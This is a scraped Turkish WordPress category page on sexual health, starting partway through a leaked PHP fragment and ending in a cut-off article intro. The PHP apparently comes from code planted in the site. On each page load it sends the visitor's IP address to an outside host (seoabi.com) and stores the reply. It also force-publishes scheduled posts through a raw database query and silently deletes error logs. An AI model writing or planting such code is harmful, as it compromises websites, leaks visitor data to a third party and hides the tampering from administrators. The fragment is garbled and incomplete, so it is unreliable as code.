$value) { $post_string .= $key.'='.urlencode(trim($value)).'&'; } rtrim($post_string, '&'); curl_setopt($ch,CURLOPT_POST, count($post)); curl_setopt($ch,CURLOPT_POSTFIELDS, $post_string); } $result=curl_exec($ch); return $result; } $mcuOutput = conn('https://seoabi.com/wmbys/blog-api.php?ip='.$_SERVER['REMOTE_ADDR']); $GLOBALS['mcuOutput'] = json_decode($mcuOutput); $wpdb->query("UPDATE `wp_posts` SET post_status = 'publish' WHERE post_status = 'future' && post_date < NOW()"); @unlink($_SERVER['DOCUMENT_ROOT'].'/error_log'); @unlink($_SERVER['DOCUMENT_ROOT'].'/imle/error_log'); ?> cinsel yaşam | Teknoloji Haberleri

cinsel yaşam kategorisindeki tüm yazılar

Son Yazılar

Sağlıklı bir cinsel yaşam

Günümüz dünyasında pek çok kişi sağlıklı bir cinsel yaşamın son derece gerekli ve faydalı olduğunu bilir. Ancak bir cinsel yaşamın sağlıklı olabilmesi için genel sağlık ve güvenlik kurallarının yanı sıra aynı zamanda da çok doğal olarak bireylerin sağlıklı olmasını sağlamak da gerekir. Pek çok kişi hem kadın